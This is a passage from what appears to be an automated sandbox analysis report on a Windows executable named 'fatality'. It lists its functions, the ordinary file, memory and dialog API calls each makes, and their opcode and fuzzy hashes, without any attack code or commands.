                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2048169685-0
                                                                                                                                                            • Opcode ID: a55233ce9b9086b6ee42bf78023d7daee8ed4c09f0dea48c0e003a5f0ba58e69
                                                                                                                                                            • Instruction ID: 4d07431577e1a5aa8bb49f8f00b855a178a7e713ab122a50fcf17b3778c8a908
                                                                                                                                                            • Opcode Fuzzy Hash: a55233ce9b9086b6ee42bf78023d7daee8ed4c09f0dea48c0e003a5f0ba58e69
                                                                                                                                                            • Instruction Fuzzy Hash: A5F0A932210249BBDF015FA1DC01FEA3BACFF0A785F488060B948E6160DB31DA98EA10
                                                                                                                                                            Function 008EA1E0 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,008E977F,?,?,008E95CF,00000000,00912641,000000FF), ref: 008EA1F1
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteFile_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3339486230-0
                                                                                                                                                            • Opcode ID: 8c4c614a528b6ce6a97657b81786e04f41bc831ed64edde555b0e5d21199d48b
                                                                                                                                                            • Instruction ID: ef8621fe4d8829e93b9847a3a308d3498e350710e6ae249933d8738b088fad8c
                                                                                                                                                            • Opcode Fuzzy Hash: 8c4c614a528b6ce6a97657b81786e04f41bc831ed64edde555b0e5d21199d48b
                                                                                                                                                            • Instruction Fuzzy Hash: 48E0D8312502496BDB015F66DC45FEA37ACFF0D7C1F488021BA44E2060EB71DEC4EA61
                                                                                                                                                            Function 008EA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,008EA592,000000FF,?,?), ref: 008EA6C4
                                                                                                                                                              • Part of subcall function 008EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,008EA592,000000FF,?,?), ref: 008EA6F2
                                                                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008EA598
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$FileFirst$Close
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2810966245-0
                                                                                                                                                            • Opcode ID: 4d1d520d5f2a68fdb69c5514c35ac93a48db8f3dec1fcec471008f57f607b0f9
                                                                                                                                                            • Instruction ID: 7d61482b58aad3c4b5dfe7f5b6097fa06b19ac91011b22c239696a8bf0c5e44c
                                                                                                                                                            • Opcode Fuzzy Hash: 4d1d520d5f2a68fdb69c5514c35ac93a48db8f3dec1fcec471008f57f607b0f9
                                                                                                                                                            • Instruction Fuzzy Hash: AFF082310087D0AACB6657F98904BCB7BE0BF1B731F14CA49F1FDA21A6C27560949B23
                                                                                                                                                            Function 008FA626 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • 735A6BB0.GDIPLUS(00000010), ref: 008FA62C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                            • Instruction ID: 56e9b56b2275e1e35190e6c732684809e866ba50fbd3a474a84bf7370d9b2582
                                                                                                                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                            • Instruction Fuzzy Hash: D8D0A7B020020CB6DF056B35CC0297E7995FB10760F008021BE45D5151EBB1D9209153
                                                                                                                                                            Function 008FDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 008FDD92
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                            • Opcode ID: 338c9c276ed71799fdb6343901a5ca36844c57694c4ebf21875db99bd3c3d5c0
                                                                                                                                                            • Instruction ID: 4af74efa81b3be8ad0b2b0afe4f6496feacfcbef38e4cff80ce979134ed25db5
                                                                                                                                                            • Opcode Fuzzy Hash: 338c9c276ed71799fdb6343901a5ca36844c57694c4ebf21875db99bd3c3d5c0
                                                                                                                                                            • Instruction Fuzzy Hash: CDD09E31158300BBD6122B65CD06F1B7AA2FB9CB05F004554B384740F1C6729D21EF12
                                                                                                                                                            Function 008E98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileType.KERNELBASE(?,008E97BE), ref: 008E98C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                            • Opcode ID: 92e39dd7460d0cb6124b307ead499447a1d4a0bda93cc141bdd1190f4d98348c
                                                                                                                                                            • Instruction ID: 54e67890585f23c02b80bd5c4e1cc8948e58f4e8beb5ed18dc4d7491b5455e3c
                                                                                                                                                            • Opcode Fuzzy Hash: 92e39dd7460d0cb6124b307ead499447a1d4a0bda93cc141bdd1190f4d98348c
                                                                                                                                                            • Instruction Fuzzy Hash: 95C01234504295AA8E208A2698480D97322FB933A67B4C6A4C0A8C90B1C362CC87EA02
                                                                                                                                                            Function 008E9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetEndOfFile.KERNELBASE(?,008E903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 008E9F0C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 749574446-0
                                                                                                                                                            • Opcode ID: 536b92b1de40550583acf9546822032701cfe3a2caa12c1c130a639a7a631e17
                                                                                                                                                            • Instruction ID: a8284a5878bde6fd8576286f53a1a8f9974322100695e0fd709112a5f30f6f91
                                                                                                                                                            • Opcode Fuzzy Hash: 536b92b1de40550583acf9546822032701cfe3a2caa12c1c130a639a7a631e17
                                                                                                                                                            • Instruction Fuzzy Hash: FBA011300A800A8A8E002B30CA0808C3B20EB20BC030082A8A00ACA8A2CB22880BEA00
                                                                                                                                                            Function 008FAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 008FAC08
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                                            • Opcode ID: c2c6def4fcf00c3d4646890b8b55f61e457a06cce05bb535c237eb29a6fc3275
                                                                                                                                                            • Instruction ID: 0f7a64aaca067e22c0bf6e8154bd5e303b494af7e9955dc981693f9a92e6aaba
                                                                                                                                                            • Opcode Fuzzy Hash: c2c6def4fcf00c3d4646890b8b55f61e457a06cce05bb535c237eb29a6fc3275
                                                                                                                                                            • Instruction Fuzzy Hash: 1DA01130308200AB8A000B328F0AA8EBAAAAFA2B20F00C028A00080030CB30C820FA00
                                                                                                                                                            Function 008E9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?,008E95D6,00000000,00912641,000000FF), ref: 008E963B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                            • Opcode ID: 6b700c18672c7884873c75200bad26bea39e5ad015f0b84dc9a828f186a8f739
                                                                                                                                                            • Instruction ID: 9c5a8b692ab0401894f5e941bfb3e46ed1c0c7ac10d84178946a17cc4307e983
                                                                                                                                                            • Opcode Fuzzy Hash: 6b700c18672c7884873c75200bad26bea39e5ad015f0b84dc9a828f186a8f739
                                                                                                                                                            • Instruction Fuzzy Hash: 19F05470485B959EDB308A25C45879277E8FB23321F045B1FD0F7829F0D7A1658D9A41
                                                                                                                                                            Function 008FAC7C Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00912641,000000FF), ref: 008FACB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3861434553-0
                                                                                                                                                            • Opcode ID: 8ff8720ec0d0e7603a1bcc054c3f5f79fb4e3de271eb3f66b22d5a51f88ab5be
                                                                                                                                                            • Instruction ID: 94708fbbe24e5b247a2ca53c91874b08dfa4e6abf1316b2a970fc8a843adbd31
                                                                                                                                                            • Opcode Fuzzy Hash: 8ff8720ec0d0e7603a1bcc054c3f5f79fb4e3de271eb3f66b22d5a51f88ab5be
                                                                                                                                                            • Instruction Fuzzy Hash: BBE06572608654EFC711AB5CDC06B45FBA8FB88B20F104266F416D37B0CB746841CA90
                                                                                                                                                            Function 00AC8598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00AC85C3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp, Offset: 0095B000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: fb0e3f811662dd3f72091f0800ed20ab8eea8358e704be5dbd2517416a78928b
                                                                                                                                                            • Instruction ID: a802c453a2d5bf6e147262262278c51455ffc3b8a1226f19fea36700b08e3599
                                                                                                                                                            • Opcode Fuzzy Hash: fb0e3f811662dd3f72091f0800ed20ab8eea8358e704be5dbd2517416a78928b
                                                                                                                                                            • Instruction Fuzzy Hash: D6E0ECB530010CABDB10CE8CD984FAA33DDB758710F118015F609E7240C678EC109765

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 0493606C Relevance: .2, Instructions: 201COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4e75acafec66baef8eeb4389bf5c1f64dd67bdde8162c42071491f2bdcc18a59
                                                                                                                                                            • Instruction ID: 405b5a4029b7e1f63dbe96c78f3b302e19dd4f5ebf92f85a9e9746b6a04099bf
                                                                                                                                                            • Opcode Fuzzy Hash: 4e75acafec66baef8eeb4389bf5c1f64dd67bdde8162c42071491f2bdcc18a59
                                                                                                                                                            • Instruction Fuzzy Hash: DC816B76E012298BCB658F64CC486ADB7B4BF44720F55829AE89AA3254EB305F85CF50
                                                                                                                                                            Function 04936391 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2ceb1e0eb3a89e796dd347ace66861108eaa222d1b4c100106723f4708d01668
                                                                                                                                                            • Instruction ID: 1627a3188da3b7abc6abaa3edb24d10dcadd474b070911f3a550849ce6161d6d
                                                                                                                                                            • Opcode Fuzzy Hash: 2ceb1e0eb3a89e796dd347ace66861108eaa222d1b4c100106723f4708d01668
                                                                                                                                                            • Instruction Fuzzy Hash: 20614D75E012298FDF659F29CC88AA9B7B5BF48710F1142D9E85EA3250EB309F85CF50
                                                                                                                                                            Function 008FF654 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
